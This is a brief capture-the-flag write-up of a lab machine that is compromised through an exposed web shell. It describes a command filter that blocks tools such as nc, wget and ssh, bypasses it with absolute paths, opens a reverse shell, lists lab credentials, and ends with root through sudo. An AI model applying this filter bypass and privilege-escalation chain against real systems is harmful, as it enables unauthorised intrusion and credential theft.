use nmap to do a thorough port scanning.

check its http service(port 80), there is an interesting entry in robots.txt /dev_shell.php

ok, rce. after trying some commands, I found that some commands are filtered, like “ls”, and commands must not contain “;”

but “dir” is not filtered

seems like there is a backup file for the webshell, download and audit.

ok, “;” is filtered out, and the command will be split by space and check if any of “pwd”, “ls”, “netcat”, “ssh”, “wget”, “ping”, “traceroute”, “cat”, “nc” exists.

bypass would be easy, just use absolute path instead of relative path.

get a reverse shell:

walked around and gather some information

I have few credentials now:

jc:Qwerty

seb:T1tanium_Paword_Hack3rs_Fear_M3

but none of these account can do anything special. checked for suid file also got nothing. debian distribution is quite new, no exploit available.

found proftp 1.3.3c installation file in /home/bob/Downloads, it has a backdoor, but from nmap result, proftp is of version 1.3.5b, tried backdoor also failed.

found something suspicious in /home/bob/Documents

notes.sh does not make any sense to me.

login.txt.gpg seems to contain login credential, but encrypted, try to decrypt, but failed after several tries of passphrase.

googled for walkthrough and found out that this is the passphrase:

use bob: b0bcat_ to login to bob’s account, and easily get root shell with sudo /bin/bash